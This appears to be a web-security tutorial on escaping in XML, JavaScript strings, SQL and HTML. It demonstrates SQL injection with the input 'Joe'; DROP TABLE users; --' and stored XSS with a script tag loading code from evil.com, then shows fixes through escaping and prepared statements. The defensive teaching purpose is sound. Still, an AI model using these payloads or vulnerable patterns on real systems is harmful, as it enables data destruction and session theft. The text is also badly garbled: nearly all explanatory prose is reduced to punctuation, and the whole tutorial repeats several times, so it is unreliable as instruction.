<?xml version="1.0" encoding="UTF-8" ?> <!-- Baseline example: the text contains no "<", ">" or "&", so nothing needs escaping --> <article> <author>Homo Sapiens</author> <contents> Suppose, there is the English text, which I don't wanna translate into Russian </contents> </article>
Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens
. Since we did this, we can write a program that would search for these specific parts, extract the text and use it for some of our own inventions.
<?xml version="1.0" encoding="UTF-8" ?> <!-- NOTE: intentionally NOT well-formed: the raw "<" in "x < n" is read as the start of a tag, so an XML parser rejects this document --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
? , - ? XML - . . . , - , i .
, - .
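<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>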
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Baseline: two plain string literals; nothing in the text collides with the quote delimiter.
var name = "Homo Sapiens",
    contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// "<" and ">" are not special inside a JS string literal - only the delimiting quote and the backslash are.
var name = "Homo Sapiens",
    contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner quote after "said " ends the string literal early, so the rest is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: \" is an escaped quote that stays inside the literal; a literal backslash is in turn written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
-- Intended query: the value Alex is a quoted string constant, nothing else is parsed as SQL.
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// Static query string, nothing user-controlled yet. (The legacy mysql_* extension used here was removed in PHP 7.0.)
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE (SQL injection): $_POST['name'] is attacker-controlled and is spliced into the query text with no
// escaping or parameterization, so a quote in the input ends the string literal and the rest is parsed as SQL.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
-- Input "Alex": contains no quote, so it lands inside the string literal as intended.
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
-- Broken: the apostrophe in Mc'Donalds ends the string literal after 'Mc', leaving Donalds' as stray tokens -> syntax error
-- (and the first sign that the input is being parsed as part of the query).
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
-- Injected: Joe' closes the string literal, ";" ends the SELECT, DROP TABLE users becomes a second statement and
-- "--" comments out the dangling quote. (The legacy mysql_query() runs only one statement per call, so this exact
-- payload fails there with a syntax error instead of dropping the table; single-statement injections that rewrite
-- the WHERE clause need no second statement, so the conclusion is unchanged.)
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<!-- VULNERABLE (stored XSS): $post['username'] and $post['body'] (user-supplied post data) are echoed into the HTML
     unescaped, so any markup contained in a post becomes live markup in every viewer's browser. -->
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<!-- Benign post: the body has no HTML-special characters (double quotes are harmless in text content), so it renders as intended. -->
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<!-- Rendered from the post "x < n": browsers usually recover from a "<" followed by a space and show it as text,
     but it is a parse error, and a "<" followed by a letter would start a tag; the character belongs here as &lt;. -->
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<!-- XSS: because the body was emitted unescaped, this <script> tag is real markup. The browser fetches
     http://evil.com/dangerous.js and runs it with the page's origin (cookies, session, DOM) for anyone who loads the page. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping approach: mysql_real_escape_string() backslash-escapes NUL, \n, \r, \, ', " and \x1a using the charset of
// the current connection, so a quote in the input can no longer terminate the SQL string literal.
// Caveats: it only protects values that sit inside quoted literals (an unquoted numeric context such as WHERE id = $id
// stays injectable); it needs an open connection whose charset was set with mysql_set_charset(), otherwise some
// multibyte charsets can still smuggle a quote past it; and the mysql_* extension was removed in PHP 7.0 - prefer
// prepared statements (PDO / mysqli), as the end of this article recommends.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
-- Input "Alex" after mysql_real_escape_string(): nothing to escape, the query is unchanged.
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
-- Input "Mc'Donalds" after escaping: the apostrophe became \' so the literal is no longer terminated early; MySQL reads the value Mc'Donalds.
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
-- Injection attempt after escaping: the quote after Joe became \', so "; DROP TABLE users; --" stays inside the string
-- literal and is compared as data (a name nobody has) instead of being run as SQL.
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
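<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>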
htmlspecialchars
, , . :
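<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>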
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
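// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);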
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
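<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>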
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
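<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>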
htmlspecialchars
, , . :
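<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>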
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
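// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);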
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
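<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>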
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
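<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>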
htmlspecialchars
, , . :
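<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>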
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
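// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);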
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
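<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>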
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
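<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>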
htmlspecialchars
, , . :
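<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>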
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
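// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);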
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
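<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>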
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
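<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>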
htmlspecialchars
, , . :
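<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>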
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
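// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);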
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
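<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>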
